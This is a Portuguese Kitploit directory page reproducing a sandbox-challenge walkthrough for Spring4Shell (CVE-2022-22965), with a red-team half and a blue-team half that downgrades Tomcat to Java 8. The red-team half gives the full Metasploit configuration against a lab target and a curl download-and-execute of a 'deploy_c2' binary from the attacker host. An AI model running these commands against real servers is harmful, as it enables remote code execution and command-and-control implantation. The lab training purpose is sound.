Skip to content
KitploitKITPLOIT
FerramentasBlog
Enviar
FerramentasBlog
Enviar

Ferramentas de Hacking, PenTest e Cibersegurança para o seu Arsenal de Segurança!

Kitploit é um diretório de ferramentas de hacking, cibersegurança e pentesting. Descubra as últimas atualizações de projetos para encontrar vulnerabilidades, analisar sistemas, automatizar testes e fortalecer sua segurança.

··Feeds·Contato·Privacidade·© 2026 Kitploit

Diretório de Ferramentas

Categorias

Ver todas as categorias
Loading categories
Sandbox-Challenge-Spring4Shell-CVE-2022-22965- — Passo a passo detalhado da exploração do CVE-2022-22965 (Spring4Shell) com Metasploit, implantação de um listener C2 e mitigação da vulnerabilidade fazendo downgrade para Java 8 em um servidor Tomcat. | Kitploit
Ferramentas/GitHubGitHub/felisha-elmer/sandbox-challenge-spring4shell-cve-2022-22965-
Análise de VulnerabilidadesExploraçãoExploração de Aplicações WebCTFTestes de PenetraçãoComando e ControleAprendizado e EducaçãoRed TeamingLabs e Prática

Mais Populares

Ver todos →

Descubra as ferramentas mais usadas pela nossa comunidade.

Explore todas as ferramentas

Navegue pela nossa coleção de ferramentas

Ver todas as ferramentas →
Compartilhar
GitHubfelisha-elmer/sandbox-challenge-spring4shell-cve-2022-22965-

Sandbox-Challenge-Spring4Shell-CVE-2022-22965-

Passo a passo detalhado da exploração do CVE-2022-22965 (Spring4Shell) com Metasploit, implantação de um listener C2 e mitigação da vulnerabilidade fazendo downgrade para Java 8 em um servidor Tomcat.

Ver Repositório
há 3 mesesAinda não revisado

Sandbox de Ameaça Spring4Shell (CVE-2022-22965)

Visão Geral

Este passo-a-passo documenta a conclusão do Desafio Sandbox focado no CVE-2022-22965, comumente conhecido como Spring4Shell — uma vulnerabilidade crítica (CVSS 9.8/10) de execução remota de código que afeta versões específicas do framework Spring Java. O desafio aborda tanto as perspectivas ofensiva (equipe vermelha) quanto defensiva (equipe azul) da vulnerabilidade.

Nota: Comandos e caminhos de arquivos neste passo-a-passo refletem o ambiente específico utilizado durante esta tentativa. Seu ambiente pode ser diferente — ajuste caminhos, endereços IP e nomes de arquivos conforme necessário.


Ambiente

MáquinaEndereço IPFunção
Security-Desk (Kali Linux)172.16.200.12Máquina de ataque e trabalho
Alvo Vermelho (Linux)172.16.100.90Alvo de exploração
Alvo Azul (Linux)172.16.100.100Alvo de endurecimento

Credenciais: playerone / password123


Objetivo da Equipe Vermelha: Implantar Listener C2 no Alvo Vermelho

Passo 1 — Identificar o Alvo

Revisei a aba de Mapa de Rede no painel do desafio para confirmar o IP do Alvo Vermelho (172.16.100.90). Usei curl para inspecionar a aplicação web rodando na porta 80:

root@kitploit:~
curl http://172.16.100.90

A saída revelou Apache Tomcat 9.0.59 com um redirecionamento para /dasmsp. Naveguei pelo código-fonte da página para identificar um endpoint de formulário POST em /dasmsp/contact.

Passo 2 — Iniciar Metasploit e Configurar o Exploit

root@kitploit:~
msfconsole
root@kitploit:~
use exploit/multi/http/spring_framework_rce_spring4shell
set RHOSTS 172.16.100.90
set LHOST 172.16.200.12
set RPORT 80
set TARGETURI /dasmsp/contact
set PAYLOAD_PATH webapps/ROOT
set HTTP_METHOD POST
set ForceExploit true
run

O exploit gerou com sucesso um shell JSP, modificou o carregador de classes, limpou o arquivo de log e abriu uma sessão de shell de comando no Alvo Vermelho.

Passo 3 — Obter um Shell Interativo

Após a sessão abrir, digitei shell para atualizar para um shell interativo. O Metasploit localizou /usr/bin/script no alvo e o usou para abrir um shell interativo como o usuário tomcat.

Passo 4 — Transferir e Executar deploy_c2

O binário deploy_c2 estava localizado no Security-Desk, não no Alvo Vermelho. Hospedei-o via um servidor HTTP Python3 no Security-Desk:

root@kitploit:~
cd /home/playerone/Desktop/Resources/
python3 -m http.server 8080

Baixei e executei a partir da sessão shell do Alvo Vermelho:

root@kitploit:~
curl http://172.16.200.12:8080/deploy_c2 -o /tmp/deploy_c2
chmod +x /tmp/deploy_c2
/tmp/deploy_c2

Saída confirmou: Done! — Listener C2 implantado com sucesso no Alvo Vermelho.


Objetivo da Equipe Azul: Mitigar CVE-2022-22965 no Alvo Azul (Downgrade para Java 8)

Passo 1 — SSH para o Alvo Azul

Do terminal do Security-Desk:

root@kitploit:~
ssh [email protected]

Senha: password123

Passo 2 — Transferir Pacotes Java 8 para o Alvo Azul

Os pacotes .deb do Java 8 estavam localizados no Security-Desk em /home/playerone/Desktop/Resources/. Transferi-os para o Alvo Azul usando SCP a partir de um terminal do Security-Desk:

root@kitploit:~
scp /home/playerone/Desktop/Resources/*.deb [email protected]:/tmp/

Pacotes transferidos:

  • adoptium-ca-certificates_1.0.2-1_all.deb
  • fonts-dejavu_2.37-6_all.deb
  • p11-kit-modules_0.24.1-2_amd64.deb
  • p11-kit_0.24.1-2_amd64.deb
  • temurin-8-jdk_8.0.402.0.0+6_amd64.deb

Passo 3 — Instalar Pacotes Java 8

Na sessão SSH do Alvo Azul:

root@kitploit:~
sudo dpkg -i /tmp/*.deb

Passo 4 — Definir Java 8 como Padrão (Solução para Problema Conhecido)

Devido a um problema conhecido do desafio, a verificação não é registrada corretamente sem definir manualmente o Java 8 como padrão:

root@kitploit:~
sudo update-alternatives --config java

Selecionei a opção 2 — /usr/lib/jvm/temurin-8-jdk-amd64/bin/java.

Passo 5 — Atualizar o Serviço Tomcat para Usar Java 8

Inspecionei o arquivo de unidade do serviço Tomcat:

root@kitploit:~
cat /etc/systemd/system/tomcat.service

Editei o arquivo para atualizar a variável de ambiente JAVA_HOME:

root@kitploit:~
sudo nano /etc/systemd/system/tomcat.service

Alterei:

root@kitploit:~
Environment="JAVA_HOME=/usr"

Para:

root@kitploit:~
Environment="JAVA_HOME=/usr/lib/jvm/temurin-8-jdk-amd64"

Passo 6 — Recarregar e Reiniciar o Tomcat

root@kitploit:~
sudo systemctl daemon-reload
sudo systemctl restart tomcat

A verificação de CVE-2022-22965 Mitigado no Alvo Azul ficou verde no painel do desafio.


Ferramentas Utilizadas

  • Metasploit Framework (módulo spring_framework_rce_spring4shell)
  • curl
  • Servidor HTTP Python3
  • SSH / SCP
  • dpkg
  • systemctl
  • update-alternatives
  • nano
Baixar ferramenta